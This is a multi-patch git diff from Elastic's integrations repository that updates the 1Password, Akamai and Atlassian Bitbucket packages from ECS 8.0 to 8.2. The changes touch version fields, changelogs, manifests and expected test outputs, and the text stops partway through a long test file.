From 43d80af27c521246b31ad95b14e2f9e98c6cc78d Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 11:54:44 -0600 Subject: [PATCH 01/23] Update 1password to ECS 8.2 --- packages/1password/_dev/build/build.yml | 2 +- packages/1password/changelog.yml | 5 +++++ .../_dev/test/pipeline/test-itemusages.json-expected.json | 4 ++-- .../item_usages/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/1password/data_stream/item_usages/sample_event.json | 2 +- .../test/pipeline/test-signinattempts.json-expected.json | 4 ++-- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../1password/data_stream/signin_attempts/sample_event.json | 2 +- packages/1password/docs/README.md | 4 ++-- packages/1password/manifest.yml | 2 +- 10 files changed, 17 insertions(+), 12 deletions(-) diff --git a/packages/1password/_dev/build/build.yml b/packages/1password/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/1password/_dev/build/build.yml +++ b/packages/1password/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index 923fff697f3..2592c7be889 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.1" changes: - description: Fix field mapping conflict for ECS `event.created`. diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json index df1f1d08add..cc7ee2c34fa 100644 --- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json +++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-08-30T18:57:42.484Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": [ @@ -75,7 +75,7 @@ { "@timestamp": "2021-08-30T19:10:00.123Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": [ diff --git a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml index f3553c2dcea..addd69c6986 100644 --- a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml +++ b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml @@ -16,7 +16,7 @@ processors: ####################### - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down - set: field: event.created diff --git a/packages/1password/data_stream/item_usages/sample_event.json b/packages/1password/data_stream/item_usages/sample_event.json index cb199f45f59..a646166ad03 100644 --- a/packages/1password/data_stream/item_usages/sample_event.json +++ b/packages/1password/data_stream/item_usages/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json index 98bfb72fb9e..1fe419bb431 100644 --- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json +++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-08-11T14:28:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "success", @@ -78,7 +78,7 @@ { "@timestamp": "2021-08-11T15:04:22.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "credentials_failed", diff --git a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml index a5160bf018a..b0a78ca514d 100644 --- a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml @@ -16,7 +16,7 @@ processors: ####################### - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down - set: field: event.created diff --git a/packages/1password/data_stream/signin_attempts/sample_event.json b/packages/1password/data_stream/signin_attempts/sample_event.json index 43821c1e5bb..7d1d557041d 100644 --- a/packages/1password/data_stream/signin_attempts/sample_event.json +++ b/packages/1password/data_stream/signin_attempts/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/1password/docs/README.md b/packages/1password/docs/README.md index 8b3c7b9ec56..4d2e545df74 100644 --- a/packages/1password/docs/README.md +++ b/packages/1password/docs/README.md @@ -84,7 +84,7 @@ An example event for `item_usages` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", @@ -222,7 +222,7 @@ An example event for `signin_attempts` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index 32d1a26fa10..2bc2b3e8bbd 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: 1password title: "1Password Events Reporting" -version: 1.1.1 +version: 1.2.0 license: basic description: Collect events from 1Password Events API with Elastic Agent. type: integration From acecb9a1f404c6ea4d3e686215a881e5174bcba6 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 12:05:12 -0600 Subject: [PATCH 02/23] Update akamai to ECS 8.2 --- packages/akamai/_dev/build/build.yml | 2 +- packages/akamai/changelog.yml | 5 +++++ .../siem/_dev/test/pipeline/test-http-json.log-expected.json | 4 ++-- .../siem/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/akamai/data_stream/siem/sample_event.json | 2 +- packages/akamai/docs/README.md | 2 +- packages/akamai/manifest.yml | 2 +- 7 files changed, 12 insertions(+), 7 deletions(-) diff --git a/packages/akamai/_dev/build/build.yml b/packages/akamai/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/akamai/_dev/build/build.yml +++ b/packages/akamai/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml index 1277fe8aa53..0b8b4c9780c 100644 --- a/packages/akamai/changelog.yml +++ b/packages/akamai/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.2" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.1.1" changes: - description: Update to ECS 8.0 diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index fbdba4579c6..4f30451505a 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json @@ -117,7 +117,7 @@ }, "@timestamp": "2017-04-04T10:57:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -273,7 +273,7 @@ }, "@timestamp": "2016-08-11T13:45:33.026Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml index 734700a2fb8..8ad2b9f08da 100644 --- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml +++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/akamai/data_stream/siem/sample_event.json b/packages/akamai/data_stream/siem/sample_event.json index ce2935b782a..3a25038b372 100644 --- a/packages/akamai/data_stream/siem/sample_event.json +++ b/packages/akamai/data_stream/siem/sample_event.json @@ -99,7 +99,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md index d7c13f310aa..be76c61cc78 100644 --- a/packages/akamai/docs/README.md +++ b/packages/akamai/docs/README.md @@ -232,7 +232,7 @@ An example event for `siem` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml index 41766a14e08..f22f5542838 100644 --- a/packages/akamai/manifest.yml +++ b/packages/akamai/manifest.yml @@ -1,6 +1,6 @@ name: akamai title: Akamai -version: 0.1.1 +version: 0.1.2 release: beta description: Akamai Integration type: integration From 7016b47cab94d5deaa5667e636300f406bef5453 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 12:11:48 -0600 Subject: [PATCH 03/23] Update atlassian_bitbucket to ECS 8.2 --- .../atlassian_bitbucket/_dev/build/build.yml | 2 +- packages/atlassian_bitbucket/changelog.yml | 5 + .../pipeline/test-audit-api.log-expected.json | 354 +++++++++--------- .../test-audit-files.log-expected.json | 204 +++++----- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/audit/sample_event.json | 2 +- packages/atlassian_bitbucket/docs/README.md | 2 +- packages/atlassian_bitbucket/manifest.yml | 2 +- 8 files changed, 289 insertions(+), 284 deletions(-) diff --git a/packages/atlassian_bitbucket/_dev/build/build.yml b/packages/atlassian_bitbucket/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/atlassian_bitbucket/_dev/build/build.yml +++ b/packages/atlassian_bitbucket/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index 9fb3befa684..9b97737b763 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index 6a32e0b2b9a..2d3d373833d 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-27T17:38:58.087Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -75,7 +75,7 @@ { "@timestamp": "2021-11-27T17:38:53.360Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -166,7 +166,7 @@ { "@timestamp": "2021-11-27T17:38:42.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -241,7 +241,7 @@ { "@timestamp": "2021-11-27T17:38:29.423Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -315,7 +315,7 @@ { "@timestamp": "2021-11-27T17:38:23.209Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -409,7 +409,7 @@ { "@timestamp": "2021-11-27T17:38:16.687Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -503,7 +503,7 @@ { "@timestamp": "2021-11-27T17:38:04.808Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -577,7 +577,7 @@ { "@timestamp": "2021-11-27T17:36:40.692Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -671,7 +671,7 @@ { "@timestamp": "2021-11-27T17:36:40.674Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -745,7 +745,7 @@ { "@timestamp": "2021-11-27T17:36:19.269Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -815,7 +815,7 @@ { "@timestamp": "2021-11-27T17:36:18.873Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -885,7 +885,7 @@ { "@timestamp": "2021-11-27T17:36:18.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -947,7 +947,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1010,7 +1010,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1073,7 +1073,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1136,7 +1136,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1199,7 +1199,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1262,7 +1262,7 @@ { "@timestamp": "2021-11-27T17:36:17.993Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1325,7 +1325,7 @@ { "@timestamp": "2021-11-27T17:36:17.991Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1388,7 +1388,7 @@ { "@timestamp": "2021-11-27T17:35:46.331Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1458,7 +1458,7 @@ { "@timestamp": "2021-11-27T17:35:45.810Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1528,7 +1528,7 @@ { "@timestamp": "2021-11-27T17:35:33.093Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1598,7 +1598,7 @@ { "@timestamp": "2021-11-27T17:35:31.362Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1668,7 +1668,7 @@ { "@timestamp": "2021-11-27T17:35:11.898Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1729,7 +1729,7 @@ { "@timestamp": "2021-11-27T17:34:26.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1790,7 +1790,7 @@ { "@timestamp": "2021-11-27T17:34:26.108Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1864,7 +1864,7 @@ { "@timestamp": "2021-11-27T17:34:26.019Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1938,7 +1938,7 @@ { "@timestamp": "2021-11-27T17:34:25.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2033,7 +2033,7 @@ { "@timestamp": "2021-11-27T17:34:24.078Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2108,7 +2108,7 @@ { "@timestamp": "2021-11-27T17:31:41.984Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2164,7 +2164,7 @@ { "@timestamp": "2021-11-27T17:31:41.375Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2232,7 +2232,7 @@ { "@timestamp": "2021-11-27T17:29:52.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2286,7 +2286,7 @@ { "@timestamp": "2021-11-27T17:29:52.688Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2340,7 +2340,7 @@ { "@timestamp": "2021-11-27T17:29:52.681Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2394,7 +2394,7 @@ { "@timestamp": "2021-11-27T17:29:52.674Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2448,7 +2448,7 @@ { "@timestamp": "2021-11-27T17:29:52.672Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2502,7 +2502,7 @@ { "@timestamp": "2021-11-27T17:29:52.560Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2556,7 +2556,7 @@ { "@timestamp": "2021-11-27T17:29:52.557Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2610,7 +2610,7 @@ { "@timestamp": "2021-11-27T17:29:52.502Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2664,7 +2664,7 @@ { "@timestamp": "2021-11-27T17:29:52.491Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2718,7 +2718,7 @@ { "@timestamp": "2021-11-27T17:29:52.477Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2772,7 +2772,7 @@ { "@timestamp": "2021-11-27T17:29:52.472Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2826,7 +2826,7 @@ { "@timestamp": "2021-11-27T17:29:52.450Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2880,7 +2880,7 @@ { "@timestamp": "2021-11-27T17:29:52.439Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2934,7 +2934,7 @@ { "@timestamp": "2021-11-27T17:29:52.216Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2988,7 +2988,7 @@ { "@timestamp": "2021-11-27T17:29:52.214Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3042,7 +3042,7 @@ { "@timestamp": "2021-11-27T17:29:52.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3096,7 +3096,7 @@ { "@timestamp": "2021-11-27T17:29:52.203Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3150,7 +3150,7 @@ { "@timestamp": "2021-11-27T17:29:52.201Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3204,7 +3204,7 @@ { "@timestamp": "2021-11-27T17:29:51.049Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3258,7 +3258,7 @@ { "@timestamp": "2021-11-27T17:29:51.037Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3312,7 +3312,7 @@ { "@timestamp": "2021-11-27T17:29:51.022Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3366,7 +3366,7 @@ { "@timestamp": "2021-11-27T17:29:51.005Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3420,7 +3420,7 @@ { "@timestamp": "2021-11-27T17:29:51.001Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3474,7 +3474,7 @@ { "@timestamp": "2021-11-27T17:29:50.889Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3528,7 +3528,7 @@ { "@timestamp": "2021-11-27T17:29:50.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3582,7 +3582,7 @@ { "@timestamp": "2021-11-27T17:29:50.863Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3636,7 +3636,7 @@ { "@timestamp": "2021-11-27T17:29:50.862Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3690,7 +3690,7 @@ { "@timestamp": "2021-11-27T17:29:50.861Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3744,7 +3744,7 @@ { "@timestamp": "2021-11-27T17:29:50.849Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3798,7 +3798,7 @@ { "@timestamp": "2021-11-27T17:29:50.846Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3852,7 +3852,7 @@ { "@timestamp": "2021-11-27T17:29:50.845Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3906,7 +3906,7 @@ { "@timestamp": "2021-11-27T17:29:50.824Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3960,7 +3960,7 @@ { "@timestamp": "2021-11-27T17:29:50.801Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4014,7 +4014,7 @@ { "@timestamp": "2021-11-27T17:29:50.718Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4068,7 +4068,7 @@ { "@timestamp": "2021-11-27T17:29:50.698Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4122,7 +4122,7 @@ { "@timestamp": "2021-11-27T17:29:50.697Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4176,7 +4176,7 @@ { "@timestamp": "2021-11-27T17:29:50.634Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4230,7 +4230,7 @@ { "@timestamp": "2021-11-27T17:29:49.656Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4284,7 +4284,7 @@ { "@timestamp": "2021-11-27T17:29:49.399Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4338,7 +4338,7 @@ { "@timestamp": "2021-11-27T17:29:49.394Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4392,7 +4392,7 @@ { "@timestamp": "2021-11-27T17:29:48.385Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4446,7 +4446,7 @@ { "@timestamp": "2021-11-27T17:29:48.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4500,7 +4500,7 @@ { "@timestamp": "2021-11-27T17:29:48.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4554,7 +4554,7 @@ { "@timestamp": "2021-11-27T17:29:32.073Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4608,7 +4608,7 @@ { "@timestamp": "2021-11-27T17:29:32.072Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4662,7 +4662,7 @@ { "@timestamp": "2021-11-27T17:29:32.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4716,7 +4716,7 @@ { "@timestamp": "2021-11-27T17:29:31.999Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4770,7 +4770,7 @@ { "@timestamp": "2021-11-27T17:29:31.988Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4824,7 +4824,7 @@ { "@timestamp": "2021-11-27T17:29:31.723Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4878,7 +4878,7 @@ { "@timestamp": "2021-11-27T17:29:24.643Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4932,7 +4932,7 @@ { "@timestamp": "2021-11-27T17:29:24.638Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4986,7 +4986,7 @@ { "@timestamp": "2021-11-27T17:29:23.479Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5040,7 +5040,7 @@ { "@timestamp": "2021-11-27T17:29:23.434Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5094,7 +5094,7 @@ { "@timestamp": "2021-11-27T17:29:23.432Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5148,7 +5148,7 @@ { "@timestamp": "2021-11-27T17:29:23.422Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5202,7 +5202,7 @@ { "@timestamp": "2021-11-27T17:29:23.406Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5256,7 +5256,7 @@ { "@timestamp": "2021-11-27T17:29:23.343Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5310,7 +5310,7 @@ { "@timestamp": "2021-11-27T17:29:23.039Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5364,7 +5364,7 @@ { "@timestamp": "2021-11-27T17:29:22.847Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5418,7 +5418,7 @@ { "@timestamp": "2021-11-27T17:29:22.726Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5472,7 +5472,7 @@ { "@timestamp": "2021-11-27T17:29:22.723Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5526,7 +5526,7 @@ { "@timestamp": "2021-11-27T17:29:22.706Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5580,7 +5580,7 @@ { "@timestamp": "2021-11-27T17:29:22.681Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5634,7 +5634,7 @@ { "@timestamp": "2021-11-27T17:29:22.680Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5688,7 +5688,7 @@ { "@timestamp": "2021-11-27T17:29:21.575Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5742,7 +5742,7 @@ { "@timestamp": "2021-11-27T17:29:21.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5796,7 +5796,7 @@ { "@timestamp": "2021-11-27T17:29:21.519Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5850,7 +5850,7 @@ { "@timestamp": "2021-11-27T17:29:21.497Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5904,7 +5904,7 @@ { "@timestamp": "2021-11-27T17:29:21.330Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5958,7 +5958,7 @@ { "@timestamp": "2021-11-27T17:29:20.129Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6012,7 +6012,7 @@ { "@timestamp": "2021-11-27T17:29:20.128Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6066,7 +6066,7 @@ { "@timestamp": "2021-11-27T17:29:20.127Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6120,7 +6120,7 @@ { "@timestamp": "2021-11-27T17:29:20.119Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6174,7 +6174,7 @@ { "@timestamp": "2021-11-27T17:29:19.922Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6228,7 +6228,7 @@ { "@timestamp": "2021-11-27T17:29:19.913Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6282,7 +6282,7 @@ { "@timestamp": "2021-11-27T17:29:19.896Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6336,7 +6336,7 @@ { "@timestamp": "2021-11-27T17:29:19.622Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6390,7 +6390,7 @@ { "@timestamp": "2021-11-27T17:29:19.613Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6444,7 +6444,7 @@ { "@timestamp": "2021-11-27T17:29:19.602Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6498,7 +6498,7 @@ { "@timestamp": "2021-11-27T17:29:18.850Z", "ecs": { - 